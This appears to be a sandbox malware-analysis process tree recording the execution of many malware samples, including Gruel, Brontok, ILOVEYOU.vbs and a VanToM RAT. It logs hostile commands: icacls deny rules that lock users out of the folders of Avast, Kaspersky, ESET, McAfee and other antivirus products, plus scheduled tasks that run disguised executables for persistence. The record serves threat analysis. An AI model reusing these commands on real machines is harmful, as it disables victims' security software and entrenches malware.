C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:5584 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:7316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:7068 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)3⤵PID:2480
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5644
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)3⤵PID:5012
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2044
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)3⤵PID:4856
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:6508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:7888
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:6676
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6964
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)3⤵PID:4640
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:7060 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:4608
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:5704 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:7680
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:3144
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:5336
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:7312
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:7536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)3⤵PID:4824
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:6368 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:7616
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2228
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)3⤵PID:3020
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4692
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:4688 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:6892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)3⤵PID:5260
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)3⤵PID:7700
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:7656
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)3⤵PID:2712
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6792
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:7976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)3⤵PID:2612
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)3⤵PID:7848
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3628
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵PID:3668
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5632
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)3⤵PID:4868
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:7648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵PID:1336
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:7344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:7492 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:7180
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3476
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 13⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:7832
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3756
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6752,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6724 /prefetch:82⤵PID:5660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6660,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3256 /prefetch:82⤵PID:3316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6792,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6824 /prefetch:82⤵PID:7700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6772,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6712 /prefetch:82⤵PID:3276
-
-
C:\Users\Admin\Downloads\Anap.a.exe"C:\Users\Admin\Downloads\Anap.a.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6736,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6836 /prefetch:82⤵PID:2096
-
-
C:\Users\Admin\Downloads\Bugsoft.exe"C:\Users\Admin\Downloads\Bugsoft.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:8056 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c c:\windows\jk.bat3⤵PID:6476
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6800,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1536 /prefetch:82⤵PID:5868
-
-
C:\Users\Admin\Downloads\Duksten.exe"C:\Users\Admin\Downloads\Duksten.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
PID:4432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 7283⤵
- Program crash
PID:3636
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6684,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3256 /prefetch:82⤵PID:556
-
-
C:\Users\Admin\Downloads\Brontok (1).exe"C:\Users\Admin\Downloads\Brontok (1).exe"2⤵PID:6560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6900,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6892 /prefetch:82⤵PID:5168
-
-
C:\Users\Admin\Downloads\Funsoul.exe"C:\Users\Admin\Downloads\Funsoul.exe"2⤵
- System Location Discovery: System Language Discovery
PID:6088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=7000,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=7004 /prefetch:82⤵PID:6672
-
-
C:\Users\Admin\Downloads\Gruel.a.exe"C:\Users\Admin\Downloads\Gruel.a.exe"2⤵
- Modifies system executable filetype association
- Adds Run key to start application
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=7068,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=7056 /prefetch:82⤵PID:8152
-
-
C:\Users\Admin\Downloads\Gruel.a.exe"C:\Users\Admin\Downloads\Gruel.a.exe" C:\Users\Admin\Downloads\Kiray.exe2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:7048
-
-
C:\Users\Admin\Downloads\Gruel.a.exe"C:\Users\Admin\Downloads\Gruel.a.exe" C:\Users\Admin\Downloads\Kiray.exe2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:7436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=7104,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=7048 /prefetch:82⤵PID:2240
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\ILOVEYOU.vbs"2⤵PID:7732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=7004,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6192 /prefetch:82⤵PID:5872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=7100,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=7160 /prefetch:82⤵PID:3564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=7044,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=7164 /prefetch:82⤵PID:952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=7088,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6816 /prefetch:82⤵PID:3144
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NewLove.vbs"2⤵
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
PID:7764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=7164,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6988 /prefetch:82⤵PID:7616
-
-
C:\Users\Admin\Downloads\Gruel.a.exe"C:\Users\Admin\Downloads\Gruel.a.exe" C:\Users\Admin\Downloads\Pikachu.exe2⤵PID:8712
-
-
C:\Users\Admin\Downloads\Gruel.a.exe"C:\Users\Admin\Downloads\Gruel.a.exe" C:\Users\Admin\Downloads\Pikachu.exe2⤵PID:9668
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:6304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4396
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3004
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2664
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Downloads\VanToM-Rat.bat1⤵PID:6556
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe1⤵PID:7144
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c1⤵PID:3172
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:3752
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:7136 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:6912 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:8132
-
-
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
PID:6568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7768
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:7696
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4488
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:2160
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:6852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
- Drops file in Windows directory
PID:6812
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:7716
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
PID:7004
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:7276
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s AppMgmt1⤵PID:5528
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:8040
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:7524
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7448
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:7140
-
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:3476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6712
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:5784
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7896
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:5344
-
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:2740
-
-
C:\Programdata\RealtekHD\taskhostw.exe"C:\Programdata\RealtekHD\taskhostw.exe"1⤵
- Executes dropped EXE
PID:5952
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1376
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:5956
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6660
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:6676
-
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:2476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6088
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:7068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7432
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:5284
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5636
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:2844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:560
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:5892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3028
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3144
-
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:7832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5644
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:6564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3716
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:7040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6380
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:4400
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7228
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:3076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5460
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:5416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2944
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7996
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:7648
-
-
